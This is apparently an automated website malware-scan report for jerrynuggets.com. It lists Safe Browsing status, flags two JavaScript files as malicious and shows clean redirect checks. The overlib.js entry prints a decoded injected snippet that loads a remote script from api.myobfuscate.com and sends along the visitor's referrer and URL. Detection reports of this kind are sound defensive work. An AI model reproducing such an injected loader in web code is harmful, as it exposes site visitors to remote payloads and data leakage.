Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=jerrynuggets.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://jerrynuggets.com/ | 200 OK Content-Length: 10386 Content-Type: text/html | clean |
http://jerrynuggets.com/ajaxtabs/ajaxtabs.js | 200 OK Content-Length: 13754 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var ddajaxtabssettings={} ddajaxtabssettings.bustcachevar=1 ddajaxtabssettings.loadstatustext="<img src='ajaxtabs/loading.gif' /> Requesting content..." function ddajaxtabs(tabinterfaceid, contentdivid){ this.tabinterfaceid=tabinterfaceid this.tabs=document.getElementById(tabinterfaceid).getElementsByTagName("a") this.enabletabpersistence=true this.hottabspositions=[] this.currentTabIndex=0 this.contentdivid=contentdivid this.defaultHTML="" this.defaultIfr Antivirus reports:
| ||
http://jerrynuggets.com/scripts/overlib.js | 200 OK Content-Length: 53438 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var olLoaded = 0;var pmStart = 10000000; var pmUpper = 10001000; var pmCount = pmStart+1; var pmt=''; var pms = new Array(); var olInfo = new Info('4.21', 1); var FREPLACE = 0; var FBEFORE = 1; var FAFTER = 2; var FALTERNATE = 3; var FCHAIN=4; var olHideForm=0; var olHautoFlag = 0; var olVautoFlag = 0; var hookPts = new Array(), postParse = new Array(), cmdLine = new Array(), runTime = new Array(); registerCommands('donothing,inarray,caparray,sticky,background,noclose,caption,left Decoded script: DONOTHING=10000001 DONOTHING=10000001 INARRAY=10000002 INARRAY=10000002 CAPARRAY=10000003 CAPARRAY=10000003 STICKY=10000004 STICKY=10000004 BACKGROUND=10000005 BACKGROUND=10000005 NOCLOSE=10000006 NOCLOSE=10000006 CAPTION=10000007 CAPTION=10000007 LEFT=10000008 LEFT=10000008 RIGHT=10000009 RIGHT=10000009 CENTER=10000010 CENTER=10000010 OFFSETX=10000011 OFFSETX=10000011 OFFSETY=10000012 OFFSETY=100000 OlI.src = 'http://api.myobfuscate.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var OlO = document.getElementsByTagName('head')[0]; OlO.appendChild(OlI);document.write(unescape(_escape)); Antivirus reports:
| ||
http://www.jerrynuggets.com/scripts/jquery-1.4.2.min.js?v=7.2 | 200 OK Content-Length: 72174 Content-Type: application/javascript | clean |
http://www.jerrynuggets.com/scripts/jquery.lazyload.mini.js?v=7.2 | 200 OK Content-Length: 2991 Content-Type: application/javascript | clean |
http://www.jerrynuggets.com/scripts/colorbox/jquery.colorbox-min.js?v=7.2 | 200 OK Content-Length: 9029 Content-Type: application/javascript | clean |
http://www.jerrynuggets.com/scripts/bookmarkscroll.js?v=7.2 | 200 OK Content-Length: 2740 Content-Type: application/javascript | clean |
http://www.jerrynuggets.com/scripts/main.js?v=7.2 | 200 OK Content-Length: 4483 Content-Type: application/javascript | clean |
http://www.jerrynuggets.com/scripts/menu.js?v=7.2 | 200 OK Content-Length: 10216 Content-Type: application/javascript | clean |
http://www.jerrynuggets.com/scripts/collapse.js?v=7.2 | 200 OK Content-Length: 1674 Content-Type: application/javascript | clean |
http://www.jerrynuggets.com/scripts/tooltip.js?v=7.2 | 200 OK Content-Length: 2394 Content-Type: application/javascript | clean |
http://jerrynuggets.com/test404page.js | 404 Not Found Content-Length: 11452 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: jerrynuggets.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Dec 2014 13:53:47 GMT
Server: Apache/2.2.16 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html
X-Powered-By: PHP/5.3.3-1ubuntu9.5
GET / HTTP/1.1
Host: jerrynuggets.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Dec 2014 13:53:47 GMT
Server: Apache/2.2.16 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html
X-Powered-By: PHP/5.3.3-1ubuntu9.5
Second query (visit from search engine):
GET / HTTP/1.1
Host: jerrynuggets.com
Referer: http://www.google.com/search?q=jerrynuggets.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: jerrynuggets.com
Referer: http://www.google.com/search?q=jerrynuggets.com
Result:
The result is similar to the first query. There are no suspicious redirects found.